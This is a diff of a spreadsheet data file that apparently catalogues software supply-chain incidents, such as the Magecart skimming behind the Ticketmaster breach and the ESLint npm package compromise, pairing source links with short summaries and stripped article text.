several companies named report including pushassist clarity connect found libraries still serving malicious code except annex cloud appeared removed replaced code code libraries served countless number websites skimming data sites sending central magecartcontrolled server case hackers left message saying delete code time encrypt sites none companies responded request comment changes well update klijnsma said wasnt clear company compromised many companies affected coordinated disclosure impossible said said magecart group extends well beyond ticketmaster discovering close toptier sites like large brands online shops name specific companies personally dont trust single online store anymore said every single could supply chain functionality suppliers compromised also send tips securely signal whatsapp 646755–8849 also send email fingerprint 4d0e 92f2 e36a ec51 daae 5d97 cb8c 15fa eb6c eea5 read zdnet investigations researchers breathalyzer flaws casting doubt countless convictions lawsuits threaten infosec research need nsas ragtime program targets americans leaked files show leaked documents reveal york airports wave lapses government pushed tech firms hand source code millions verizon customer records exposed lapse meet shadowy tech brokers deliver data inside global terror watchlist secretly shadows millions million americans largest ever voter records leak britain passed extreme surveillance ever passed democracy microsoft says known ransomware runs windows tried hack leaked document reveals plans wider internet surveillance researchers breathalyzer flaws casting doubt countless convictions lawsuits threaten infosec research need nsas ragtime program targets americans leaked files show leaked documents reveal york airports wave lapses government pushed tech firms hand source code millions verizon customer records exposed lapse meet shadowy tech brokers deliver data inside global terror watchlist secretly shadows millions million americans largest ever voter records leak britain passed extreme surveillance ever passed democracy microsoft says known ransomware runs windows tried hack leaked document reveals plans wider internet surveillance editorial standards show comments comment community guidelines related best airtag wallet flat rechargeable isnt made apple openais store brimming promise spam access apple card transactions reasons zdnet equip harness power disruptive innovation work home topics galleries videos sell share personal information zdnet meet team sitemap reprint policy join newsletters site assistance licensing zdnet ventures company rights reserved privacy policy cookie settings advertise terms</t>
+          <t>The credit card skimming effort of a massive campaign by a threat group -- dubbed Magecart, operational since at least 2015 -- targets software companies that build and provide code that developers include on their websites to improve the site or customer experience. After the hackers break in and alter the code, it affects every website that it runs on, potentially affecting millions of users every day. At least 800 e-commerce sites are said to be affected, after they included code developed by third-party companies and later altered by hackers.  The ticket selling giant admitted that some customers had their payment data compromised because its website was running code from Inbenta, a customer support software company, which hackers had altered.</t>
         </is>
       </c>
       <c r="D74" t="inlineStr">
         <is>
           <t>https://www.zdnet.com/article/ticketmaster-breach-was-part-of-a-larger-credit-card-skimming-effort-analysis-shows/</t>
-        </is>
-      </c>
-      <c r="E74" t="inlineStr">
-        <is>
-          <t>['apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'tomorrow', 'embrace', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'home', 'tech', 'ticketmaster', 'part', 'large', 'credit', 'card', 'skimming', 'effort', 'analysis', 'breach', 'oneoff', 'event', 'part', 'massive', 'credit', 'card', 'skimming', 'operation', 'recent', 'breach', 'ticketmaster', 'wide', 'massive', 'credit', 'card', 'skimming', 'operation', 'research', 'least', 'ecommerce', 'site', 'code', 'thirdparty', 'company', 'hacker', 'firm', 'riskiq', 'credit', 'card', 'skimming', 'effort', 'massive', 'campaign', 'group', 'operational', 'least', 'target', 'software', 'company', 'code', 'developer', 'website', 'site', 'customer', 'experience', 'hacker', 'code', 'website', 'million', 'user', 'klijnsma', 'researcher', 'riskiq', 'large', 'credit', 'card', 'breach', 'date', 'thirdparty', 'code', 'supplier', 'hacker', 'case', 'victim', 'research', 'mind', 'last', 'week', 'ticketmaster', 'breach', 'ticket', 'selling', 'giant', 'customer', 'payment', 'datum', 'website', 'code', 'customer', 'support', 'software', 'company', 'hacker', 'uncommon', 'website', 'thirdparty', 'code', 'site', 'service', 'present', 'single', 'point', 'failure', 'site', 'code', 'ticketmaster', 'ticketmaster', 'site', 'code', 'riskiq', 'ticketmaster', 'breach', 'big', 'first', 'several', 'global', 'site', 'site', 'code', 'thirdparty', 'company', 'group', 'social', 'analysis', 'company', 'sociaplus', 'hacker', 'code', 'credit', 'card', 'checkout', 'site', 'code', 'hacker', 'malicious', 'code', 'javascript', 'library', 'button', 'form', 'hooked', 'user', 'button', 'form', 'field', 'page', 'skimmer', 'extract', 'name', 'value', 'field', 'drop', 'server', 'actor', 'riskiq', 'researcher', 'ticketmaster', 'prior', 'publication', 'hard', 'comment', 'report', 'early', 'comment', 'claim', 'sociaplus', 'request', 'comment', 'thirdparty', 'code', 'company', 'ecommerce', 'site', 'analytic', 'website', 'content', 'delivery', 'companys', 'proprietary', 'investigation', 'platform', 'company', 'thirdparty', 'code', 'supplier', 'javascript', 'personal', 'information', 'user', 'site', 'loaded', 'code', 'affected', 'code', 'several', 'company', 'report', 'pushassist', 'clarity', 'library', 'malicious', 'code', 'code', 'code', 'library', 'countless', 'number', 'website', 'data', 'site', 'central', 'server', 'case', 'hacker', 'message', 'code', 'time', 'site', 'none', 'company', 'request', 'comment', 'change', 'klijnsma', 'clear', 'company', 'many', 'company', 'coordinated', 'disclosure', 'impossible', 'group', 'ticketmaster', 'close', 'toptier', 'site', 'large', 'brand', 'online', 'shop', 'specific', 'company', 'single', 'online', 'store', 'single', 'chain', 'functionality', 'supplier', 'tip', 'signal', 'whatsapp', 'email', 'fingerprint', '4d0e', 'daae', 'cb8c', '15fa', 'investigation', 'researcher', 'flaw', 'doubt', 'countless', 'conviction', 'lawsuit', 'infosec', 'research', 'ragtime', 'program', 'target', 'file', 'document', 'airport', 'lapse', 'government', 'tech', 'firm', 'source', 'code', 'verizon', 'customer', 'record', 'lapse', 'shadowy', 'tech', 'broker', 'datum', 'global', 'terror', 'watchlist', 'million', 'large', 'voter', 'record', 'extreme', 'surveillance', 'democracy', 'ransomware', 'window', 'hack', 'document', 'plan', 'wide', 'internet', 'surveillance', 'researcher', 'flaw', 'doubt', 'countless', 'conviction', 'lawsuit', 'infosec', 'research', 'ragtime', 'program', 'target', 'file', 'document', 'airport', 'lapse', 'government', 'tech', 'firm', 'source', 'code', 'verizon', 'customer', 'record', 'lapse', 'shadowy', 'tech', 'broker', 'datum', 'global', 'terror', 'watchlist', 'million', 'large', 'voter', 'record', 'extreme', 'surveillance', 'democracy', 'ransomware', 'window', 'hack', 'document', 'plan', 'wide', 'internet', 'surveillance', 'editorial', 'standard', 'comment', 'comment', 'community', 'guideline', 'good', 'airtag', 'wallet', 'flat', 'rechargeable', 'apple', 'store', 'promise', 'spam', 'access', 'apple', 'card', 'transaction', 'reason', 'harness', 'power', 'disruptive', 'innovation', 'work', 'home', 'topic', 'gallery', 'video', 'share', 'personal', 'information', 'meet', 'team', 'sitemap', 'reprint', 'policy', 'join', 'site', 'assistance', 'company', 'right', 'privacy', 'policy', 'cookie', 'setting', 'term']</t>
         </is>
       </c>
     </row>
@@ -2379,17 +2085,12 @@
       </c>
       <c r="C75" t="inlineStr">
         <is>
-          <t>skip main content donate team blog docs store playground published postmortems postmortem malicious packages published july 12th malicious versions eslint packages published unpublished sorry share details attack precautionary recommendations package maintainers please check using affected packages summary july 12th attacker compromised account eslint maintainer published malicious versions eslintscope eslintconfigeslint packages registry installation malicious packages downloaded executed code pastebincom sent contents user’s npmrc file attacker npmrc file typically contains access tokens publishing malicious package versions eslintscope372 eslintconfigeslint502 unpublished pastebincom paste linked packages also taken revoked access tokens issued result access tokens compromised attack longer usable maintainer whose account compromised reused password several sites twofactor authentication enabled account eslint team sorry allowing happen hope package maintainers learn mistakes improve whole ecosystem affected packages eslintscope37 scope analysis library dependency several popular packages including older versions eslint latest versions babeleslint webpack eslintconfigeslint50 configuration used internally eslint team little usage elsewhere registry unpublish malicious versions package already unpublished npmjscom registry attack method details attack found recommendations hindsight incident recommendations package maintainers users future package maintainers users avoid reusing password across multiple different sites password manager like 1password lastpass help package maintainers enable twofactor authentication guide lerna follow issue package maintainers audit limit number people access publish package maintainers careful using services automerge dependency upgrades application developers lockfile packagelockjson yarnlock prevent autoinstall packages timeline incident attacker presumably found maintainer’s reused email password thirdparty breach used maintainer’s account early morning july 12th attacker generated authentication token maintainer’s account attacker used generated authentication token publish eslintconfigeslint502 contained malicious postinstall script attempts exfiltrate local machine’s npmrc authentication token attacker unpublished eslintconfigeslint502 attacker published eslintscope372 contained malicious postinstall script user posted eslinteslintscope39 notifying eslint team issue pastebincom link containing malicious code taken team unpublished eslintscope372 contacted eslint maintainer eslint team published eslintscope373 code eslintscope371 caches could pick version revoked access tokens generated links original report eslinteslintscope39 status henry eslint alumnus learning maintain stuff contributors henry hzoo tags share share share share share blog latest eslint news case studies tutorials resources view posts published release notes read eslint v900rc0 released pushed eslint v900rc0 major release upgrade eslint release adds features fixes several bugs found previous release release also breaking changes please read following closely francesco trotta published release notes read eslint v900beta2 released pushed eslint v900beta2 major release upgrade eslint release adds features fixes several bugs found previous release release also breaking changes please read following closely milos djermanovic published release notes read eslint v900beta1 released pushed eslint v900beta1 minor release upgrade eslint release adds features fixes several bugs found previous release milos djermanovic ready javascript code install start donating today started become sponsor social media theme switcher light dark change language language switcher selecting language take eslint website language language deutsch english español français हिन्दी português 简体中文 copyright openjs foundation eslint contributors rights reserved openjs foundation registered trademarks uses trademarks list trademarks openjs foundation please trademark policy trademark list trademarks logos indicated list openjs foundation trademarks trademarks™ registered® trademarks respective holders imply affiliation endorsement secondary branding openjs foundation terms privacy policy openjs foundation bylaws trademark policy trademark list cookie policy</t>
+          <t>An attacker compromised the npm account of an ESLint maintainer and published malicious versions of the eslint-scope and eslint-config-eslint packages to the npm registry. On installation, the malicious packages downloaded and executed code from pastebin.com which sent the contents of the host .npmrc file to the attacker. An .npmrc file typically contains access tokens for publishing to npm.</t>
         </is>
       </c>
       <c r="D75" t="inlineStr">
         <is>
           <t>https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes</t>
-        </is>
-      </c>
-      <c r="E75" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'team', 'blog', 'doc', 'store', 'playground', 'postmortem', 'postmortem', 'malicious', 'package', 'malicious', 'version', 'eslint', 'package', 'unpublished', 'sorry', 'share', 'detail', 'attack', 'precautionary', 'recommendation', 'package', 'maintainer', 'package', 'account', 'malicious', 'version', 'eslintscope', 'registry', 'installation', 'malicious', 'package', 'code', 'content', 'user', 'npmrc', 'file', 'attacker', 'npmrc', 'file', 'access', 'token', 'malicious', 'package', 'version', 'paste', 'package', 'access', 'token', 'result', 'access', 'token', 'attack', 'usable', 'maintainer', 'account', 'password', 'several', 'site', 'twofactor', 'authentication', 'account', 'eslint', 'team', 'sorry', 'happen', 'hope', 'package', 'maintainer', 'mistake', 'whole', 'ecosystem', 'package', 'eslintscope37', 'analysis', 'library', 'several', 'popular', 'package', 'old', 'version', 'late', 'version', 'little', 'usage', 'registry', 'unpublish', 'malicious', 'version', 'package', 'registry', 'attack', 'method', 'detail', 'attack', 'recommendation', 'incident', 'recommendation', 'package', 'user', 'future', 'package', 'user', 'password', 'multiple', 'different', 'site', 'password', 'manager', 'lastpass', 'package', 'maintainer', 'enable', 'twofactor', 'authentication', 'guide', 'lerna', 'follow', 'issue', 'package', 'audit', 'limit', 'number', 'people', 'publish', 'package', 'careful', 'service', 'automerge', 'dependency', 'upgrade', 'application', 'developer', 'lockfile', 'attacker', 'maintainer', 'email', 'password', 'thirdparty', 'breach', 'maintainer', 'account', 'early', 'morning', 'attacker', 'authentication', 'account', 'attacker', 'authentication', 'malicious', 'postinstall', 'script', 'attempt', 'local', 'machine', 'npmrc', 'authentication', 'token', 'attacker', 'attacker', 'malicious', 'postinstall', 'script', 'user', 'eslinteslintscope39', 'team', 'issue', 'link', 'malicious', 'code', 'team', 'maintainer', 'team', 'eslintscope371', 'cache', 'version', 'access', 'token', 'link', 'original', 'report', 'eslinteslintscope39', 'status', 'stuff', 'contributor', 'tag', 'share', 'share', 'share', 'share', 'blog', 'late', 'news', 'case', 'study', 'tutorial', 'resource', 'view', 'post', 'release', 'note', 'major', 'release', 'upgrade', 'feature', 'fix', 'several', 'bug', 'previous', 'release', 'release', 'change', 'francesco', 'trotta', 'release', 'note', 'major', 'release', 'upgrade', 'feature', 'fix', 'several', 'bug', 'previous', 'release', 'release', 'change', 'release', 'note', 'minor', 'release', 'upgrade', 'feature', 'fix', 'several', 'bug', 'previous', 'release', 'ready', 'code', 'install', 'today', 'sponsor', 'social', 'medium', 'theme', 'switcher', 'light', 'dark', 'change', 'language', 'language', 'switcher', 'language', 'eslint', 'website', 'language', 'language', 'foundation', 'contributor', 'foundation', 'trademark', 'trademark', 'list', 'trademark', 'openj', 'foundation', 'trademark', 'policy', 'trademark', 'list', 'trademark', 'logo', 'list', 'openj', 'foundation', 'trademark', 'trademark', '®', 'trademark', 'respective', 'holder', 'affiliation', 'endorsement', 'secondary', 'branding', 'openj', 'foundation', 'term', 'privacy', 'policy', 'openj', 'foundation', 'bylaw', 'trademark', 'policy', 'trademark', 'list', 'cookie', 'policy']</t>
         </is>
       </c>
     </row>
@@ -2406,17 +2107,12 @@
       </c>
       <c r="C76" t="inlineStr">
         <is>
-          <t>skip main content microsoft microsoft teams copilot windows surface xbox deals small business support microsoft office windows surface xbox deals support software windows apps onedrive outlook skype onenote microsoft teams microsoft edge devices computers shop xbox accessories mixed reality phones entertainment xbox game pass ultimate xbox live gold xbox games games windows digital games movies business microsoft azure microsoft dynamics microsoft microsoft industry data platform microsoft advertising licensing shop business developer visual studio windows server windows center docs microsoft rewards free downloads education store locations gift cards view sitemap search search microsoftcom cancel current useragent string appears automated process incorrect please click link united states english microsoft homepage whats surface laptop studio surface laptop surface surface laptop microsoft copilot copilot windows microsoft windows apps microsoft store account profile download center microsoft store support returns order tracking certified refurbished microsoft store promise flexible payments education microsoft education devices education microsoft teams education microsoft education school educator training development deals students parents azure students business microsoft cloud microsoft dynamics microsoft microsoft power platform microsoft teams copilot microsoft small business developer azure developer center documentation microsoft learn microsoft tech community azure marketplace appsource visual studio company careers microsoft company news privacy microsoft investors diversity inclusion accessibility sustainability english united states sitemap contact microsoft privacy terms trademarks safety recycling microsoft</t>
+          <t>Attackers compromised a font package installed by a PDF editor application and used it to deploy a cryptocurrency miner on users' computers. Since the PDF editor was installed under SYSTEM privileges, the malicious coinminer code hidden inside the font package would receive full access to the victims' system.</t>
         </is>
       </c>
       <c r="D76" t="inlineStr">
         <is>
           <t>https://www.microsoft.com/security/blog/2018/07/26/attack-inception-compromised-supply-chain-within-a-supply-chain-poses-new-risks/</t>
-        </is>
-      </c>
-      <c r="E76" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'small', 'business', 'support', 'deal', 'support', 'software', 'window', 'app', 'outlook', 'device', 'computer', 'accessory', 'mixed', 'reality', 'phone', 'game', 'game', 'digital', 'game', 'movie', 'platform', 'licensing', 'shop', 'business', 'developer', 'visual', 'studio', 'free', 'download', 'education', 'store', 'location', 'gift', 'card', 'sitemap', 'search', 'search', 'current', 'useragent', 'string', 'automated', 'process', 'incorrect', 'homepage', 'surface', 'laptop', 'studio', 'surface', 'laptop', 'surface', 'surface', 'copilot', 'app', 'store', 'account', 'profile', 'center', 'support', 'return', 'order', 'tracking', 'store', 'flexible', 'payment', 'education', 'device', 'school', 'educator', 'training', 'development', 'deal', 'student', 'parent', 'student', 'small', 'business', 'developer', 'azure', 'developer', 'center', 'documentation', 'azure', 'marketplace', 'appsource', 'visual', 'studio', 'company', 'news', 'privacy', 'inclusion', 'accessibility', 'sustainability', 'contact', 'term', 'safety']</t>
         </is>
       </c>
     </row>
@@ -2433,17 +2129,12 @@
       </c>
       <c r="C77" t="inlineStr">
         <is>
-          <t>menu tools atoms consulting attack hidden devil development life cycle google play apps infected windows executable files people reacted read share chen wenjun xiao zhang july category unit tags android google play post also available japanese last year unit reported number google play apps infected malicious iframes report recently found similar cases google play however time google play apps infected malicious microsoft windows executable files instead malicious iframes reported findings google team infected apps removed google play notably infected files pose android devices embedded windows executable binaries windows systems inert ineffective android platform fact files infected indicates developers creating software compromised windows systems infected malware type infection software supply chain compromising software developers proven effective tactic wide scale attacks examples include keranger xcodeghost notpetya infected apps released google play october november means apps google play half year among infected apps several installations 4star ratings figure infected downloads rating interestingly mixture infected noninfected apps developers believe reason might developers used different development environment different apps infected apps include “learn draw clothing” teaching people draw design clothing “modification trail” showing images trail bike modification ideas “gymnastics training tutorial” letting people find healthy ideas gymnastic moves figure apps developer marked infected windows keylogger among infected apps file contain multiple malicious files different locations different file names however mainly files embedded across infected apps according analysis results wildfire file infected files including apps google play second file infected files samples files mentioned inside among infected bundles found number malicious files inside developers’ machines seriously infected various malware families investigating malicious files found file infects android apps malicious activity file logging windows system logger attempts keystrokes include sensitive information like credit card numbers social numbers passwords besides files fake names make appearance look legitimate names include “androidexe” musicexe” “copydokkepexe” “jsexe” “galleryexe” “imagesexe” “msnexe” “cssexe”­ palo alto networks’ wildfire analysis malicious files following suspicious activities executed windows system creates executable hidden files windows system folders including copying changes windows registry autostart restarting attempts sleep long period suspicious network connection activities address port potential damage mitigation malicious files cannot directly android hosts however file unpacked windows machine files accidentally executed developers also issue windowsbased software developers infected malicious files runnable android platforms situation much worse customers palo alto networks protected wildfire traps android wildfire able automatically detect infected apps traps android protects android devices automatically intercepts malicious apps installed device leveraging wildfire protect device malicious apps blocking notifying user development environment critical part software development life cycle always secure first otherwise countermeasures could attempts vain acknowledgements would like thank ryan olson palo alto networks assistance analysis appendix files found infected apps 9af18bd1bc68e0f49f8935a8cf662729cc1cec773f0237188762cebe75d48521 bdfabde9e45693a218e0391005f32e3546dedd0bc757cea2012ad42afdbe2f06 cadee0451947759cae1c94545ca910486e504c6544f6e60ba0a176b31df44abf 11ada55cc9dfcbafe969510b0711b110a8991b5deca2f296b895969958a66559 138f338653c82b86ea94829058a0e0bc18940903f6d7a01a7f0c2ba47f68e7e2 99074b45b20f794c35b72dbd6af2380497b8b482814822d88ca9c1c5cf83a400 57b345f635bf77f5b0da01248a1b798cbd8deb2c66306303ca595f3ccfaa8fbe e355275030efa1ddb8bc233095c189a9cc6586ba241a1c4b7a9fe1875945bbf7 355c640a0cd3793f0e6ed96dd8175afe32d6bae7a8f8d1f1496167e5f2191195 88bdf6e443300988e160204778d859fb5a0dca775876ff8b079a4eb886ad4372 78c91a6071e73e7b0ebd10ff7a4a62d3412fe0f281e4ac064eeedbf707b15b22 524c780f3f35c5c9dd1bd935affe312f89ff851d51f9df21e78730134d4e7c50 cb09e6e28e2e0e3c031d99cb122ca767a23ecea1a2e98cb6d8bcf6ff7e61151e b0442ad97086c4850133dcc72746f877cbbdb0b037374e598e231f8728dcda0c 07b07b74743364451876dca12531cdd515feff6264745be49add094388537685 edfadee37e5dd0e045d211ba9b09c2ac0f267790ac4ef8d7f9beced25d94c1fc 493d95c5222a86d581110d7c38b62a4e2015bf782ddac04c5a7e576a0955a727 5889a05fc1f161fe23ec9e3dfeb35ac225621f3c5c7019df7afa14aefdb96235 78f936fd6a8cabc39c727976ab9c2c6ceeb5be690186e2a729f59adaad7b3f4c 7268ea040b7ca1ab79d3f1eac279cf4cbc072c706b70672eba8d84387f76b3bf 688d39cfa1f581e841a896963b83081960844cdf06d3c71e7eab2746e498d5b1 df74876a564d38bf8fd3275fd0a429ee74c3f67b2e78f59d97c2ec8a7143bd9a following infected files found google play sha256 name package name 1896ed8d12f5a7c3046acd929e64cc97e8acb020e40c1b3a2001b30003f50883 baby room comkamarbayiodieapps 290b7f930361d06e8f8c93aa9f97405d6b4b9fef7f9ac13c3c73c8966cf0e83a motor trail commotortrailodieapps b2fec79084611ad8abed3354399b2e759e903ec15976b9d10ac05e548964a1e9 tattoo name comtattonamaodieapps b828b870a317693a0ae0544b9d0ffddcf6442da4d1979f6f8ccafcbe5c96d1e3 garage comlgarasimobilodieapps 86661a4a611484f8db2593bfae241db9b53274a1736ec668335f878ed24795e4 japanese garden comtamanjapangodieapps 79e77835c9690ca0bc6d376659dd15f50e396bbc573fcc7293d458d8002f6a60 fish comikankoiodieapps 91bb8594e118338f38de22e96e89cc5e11d619da3ec3dc0ecada13720111a588 house terrace comterasrumahodieapps c41a8edaa85344e48a75843447358ea7a092fe1061bca79ac535abf467112eda skirt design comdesainrokkodieapps 52d9df500ae7684d58c2bf65fb6852da1440e79b07a049f72585ccf8665e9d64 yoga meditation commeditasiyogaodieapps 21fce35139cfdf1145855987b6e3306adf26c3b60ba59b1c364a3d7d44bc5285 shoe rack comraksepatuodieapps 4739a7d1317fee0a7a885a00468d9749bb7da5c5f1696408deaa736fa2aab6e9 unique tshirt comkaosunikodieapps bc49cec1896f7f4542ff8712da8475bf5e55abe7558918c260492467eb03ef6f mens shoes comsepatupriaodieapps 7345975ca29d16e3b55309e84f6249990878482ed55e597269fdd0cb77a290ff ruang tamu comtvruangtamuodieapps ecb04d5359949bfbbc64fd7bedd8fde3a5b9703784fea8d758a3a643117165b0 idea glasses comideakacamataodieapps a21f4e9536dcbcd810fbfcdff8f6cce5b6338f1d5df7ba45abd1a5f4ed8dca76 fashion muslim comfashionmuslimodieapps 41386181f9e7dc8085d6a117607cd79346744d925e5d2ca67759742fbac47e51 bracelet comgelangtutodieapps fceda65ea8624af018c072c60ed5fcb8b6bb00832fb63559e819463d2ba9db4e clothing drawing combusanamenggambarodieapps c5b24cf5d348a6fe3ad543f70379c7d9fa60a8e9bac03d6ea387fcdbcbbca932 minimalist kitchen comdapurminimalisodieapps c36e7566e2e92898162006b9922d9d8f450867224b67d2346f70d7e76b1cbae6 nail comsenikukuodieapps 0039f9b2faac6146bddc2831fdfa6a03327f77d3954a1a27ab66e6b0b5952a3a cream stick comstikezkrimodieapps a8687cb35ee453958dc1757608505f3c5a7f137909f517acb7a850316d0e87b4 roof comataprumahodieapps 7da49a0122444b2087a582d142c82375541544fd765f29b9b3f7728e598b54e0 children clothes combusanaanakodieapps 7312c5ba59f89350b13fe93107233a06c79a68eedff0eb082ef7a5f24bec76e2 home ceiling complafonrumahodieapps bf00efc96cf3ecdd3069afbbfae53aeb79910848721fe50d64410760790f1a27 pola baju compolabajuodieapps 892f883d3588ee952888cccb4bb9bb33092f1be924d981e69595a758daca8c86 living room comruangtamuodieapps 5a1693d255e5f487214fd1cd46c0cff8d5375903459c7f87ae17f636fa470e32 bookshelf comrakbukuodieapps 906cd586d8f7388c1fbb0581b926aa4b2dc5534d460cc3ba011198d26a1dfe16 knitted baby comrajutanbayiodieapps 96bd87c8bd8772b1f11b3e4771889b4d2d81739cd2ef7494a3ff54fc28e711f6 hair paint comcatrambutodieapps 54380fa8c12f6333a22fd0c728e615e92470565e96c7b39ae2f1d7e30584fc31 wall decoration comdekorasidindingodieapps b6671808dbc226c11697c54d000b6a30213478c141d96aa4c3d52fa5243cff16 painting mahendi commelukismehndiodieapps 525c515e3e8c0d6007ab79f05a64c42951b440db4ab12f397218efa9692faa84 bodybuilder combinaragawanodieapps 399058e95153600a471d94309a6c3e87f3851647fb003f6d4289fa5b5df389a4 couple shirts comkaoscoupleodieapps 44066a23057ee93bed27737e8f444150c29c68b14bc9b21419f549188e436103 unique graffiti comgrafitiunikodieapps 1fcd61a10c170d259fca12e52d1930018adafad5613551b5bbb14987de1c7cfd paper flower combungakertasodieapps 0b85488788f7f83e879f41591d674b50d4daafb60094918391d98f143ba54ddc night gown combajutidurodieapps cb11dd259fa4fc0c1b4ee878cfb3c2df2a0a6ecab83276e33185ba7ce45c46ba wardrobe ideas comidelemariodieapps 4091c8acea954fffd22be4c0675c440cf1fe4620d6659b8d23d8d3a2fc815e20 dining table commejamakanodieapps 9412ca41b7c9aebaeef05fe5c45bf5c5d998e5da44d5a7a495f5ba06c00feea0 gymnastics comlatihansenamodieapps 761032267b9659cd04676fce55e602a87e43cb4c75c58fa61486cc73da0016c6 child compakaiananakodieapps 14bffba23e2bf4a61b4a54f1ef5027225290eab7f10d4c663570629e456cf51e window design comdesainjendelaodieapps 5dca7151c50ce88102b1fc5c0dd984c57202ad7c67f25be231d64cf1d52da437 hijab style comhijabstyleodieapps 3350f4eb55c2f00c1ba0380044a1a6670a4eddc5cbabf903f2ad2e266eab58d2 wing chun comteknikwingchunixsadroid c99a6e7e5d066076bacfad9142e3cf01855525782d638ccfe9ce7cd57d11ca5c fencing technique comteknikanggarxsadroid updates palo alto networks sign receive latest news cyber intelligence research please enter email address please mark robot submitting form agree terms acknowledge privacy statement popular resources resource center blog communities tech docs unit sitemap legal notices privacy terms documents account manage subscriptions report vulnerability palo alto networks rights reserved</t>
+          <t>there are 145 Google Play apps infected by malicious Microsoft Windows executable files on the Google Play Store. Palo Alto Networks reported the findings to Google Security Team and all infected apps have been removed from Google Play.</t>
         </is>
       </c>
       <c r="D77" t="inlineStr">
         <is>
           <t>https://unit42.paloaltonetworks.com/unit42-hidden-devil-development-life-cycle-google-play-apps-infected-windows-executable-files/</t>
-        </is>
-      </c>
-      <c r="E77" t="inlineStr">
-        <is>
-          <t>['menu', 'tool', 'attack', 'development', 'life', 'cycle', 'play', 'app', 'window', 'executable', 'file', 'people', 'share', 'unit', 'tag', 'play', 'post', 'available', 'japanese', 'last', 'year', 'unit', 'number', 'google', 'play', 'app', 'malicious', 'iframe', 'report', 'similar', 'case', 'google', 'play', 'time', 'play', 'app', 'malicious', 'executable', 'file', 'malicious', 'iframe', 'finding', 'team', 'app', 'play', 'file', 'device', 'window', 'executable', 'binary', 'window', 'system', 'ineffective', 'android', 'platform', 'fact', 'file', 'developer', 'software', 'window', 'system', 'malware', 'type', 'infection', 'software', 'supply', 'chain', 'software', 'developer', 'effective', 'tactic', 'wide', 'scale', 'attack', 'example', 'app', 'play', 'app', 'half', 'year', 'infected', 'app', 'several', 'installation', 'rating', 'figure', 'download', 'rating', 'mixture', 'noninfected', 'app', 'developer', 'reason', 'developer', 'different', 'development', 'environment', 'different', 'app', 'app', 'draw', 'clothing', 'people', 'design', 'clothing', 'modification', 'trail', 'image', 'trail', 'bike', 'modification', 'idea', 'gymnastic', 'training', 'tutorial', 'people', 'healthy', 'idea', 'gymnastic', 'move', 'figure', 'app', 'developer', 'window', 'keylogger', 'infected', 'app', 'file', 'multiple', 'malicious', 'file', 'different', 'location', 'different', 'file', 'name', 'file', 'infected', 'app', 